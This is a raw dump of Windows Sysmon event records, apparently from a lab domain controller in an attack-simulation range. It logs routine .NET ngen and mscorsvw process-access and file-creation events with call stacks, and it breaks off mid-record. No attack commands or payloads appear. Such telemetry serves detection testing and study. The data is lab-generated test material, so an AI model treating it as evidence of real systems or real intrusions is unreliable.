13:27:13.562{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B1-6000-E704-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000009018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.499{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B1-6000-E604-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.484{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46B1-6000-E604-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.484{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B1-6000-E604-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000009015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:13.421{08A6967A-46B1-6000-E504-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ce8-0\WindowsFormsIntegration.dll2021-01-14 13:27:13.421 10341000x80000000000000009014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.202{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B1-6000-E504-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.187{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46B1-6000-E504-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.187{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B1-6000-E504-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000009011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.124{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B1-6000-E404-000000009A01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.109{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46B1-6000-E404-000000009A01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.109{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B1-6000-E404-000000009A01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000009008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:13.030{08A6967A-46B0-6000-E304-000000009A01}5028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13a4-0\UIAutomationTypes.dll2021-01-14 13:27:13.030 10341000x80000000000000009038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.515{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44E2-6000-2D01-000000009A01}5084C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.437{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-46B2-6000-EB04-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.437{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-46B2-6000-EB04-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.405{08A6967A-44E2-6000-3001-000000009A01}5044740C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.405{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.405{08A6967A-44E2-6000-2D01-000000009A01}50842160C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{00000000-0000-0000-0000-000000000000}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000154404B)|UNKNOWN(0000000001543CFC)|UNKNOWN(0000000001544CBE)|UNKNOWN(0000000001542444)|UNKNOWN(0000000001540B66)|UNKNOWN(000000000154054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64) 11241100x80000000000000009032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:14.202{08A6967A-46B2-6000-EA04-000000009A01}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1238-0\XsdBuildTask.dll2021-01-14 13:27:14.202 10341000x80000000000000009031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.093{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B2-6000-EA04-000000009A01}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.077{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46B2-6000-EA04-000000009A01}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.077{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B2-6000-EA04-000000009A01}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000009028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:14.015{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B2-6000-E904-000000009A01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.999{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46B2-6000-E904-000000009A01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.999{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B2-6000-E904-000000009A01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000009051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.374{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46B3-6000-EC04-000000009A01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 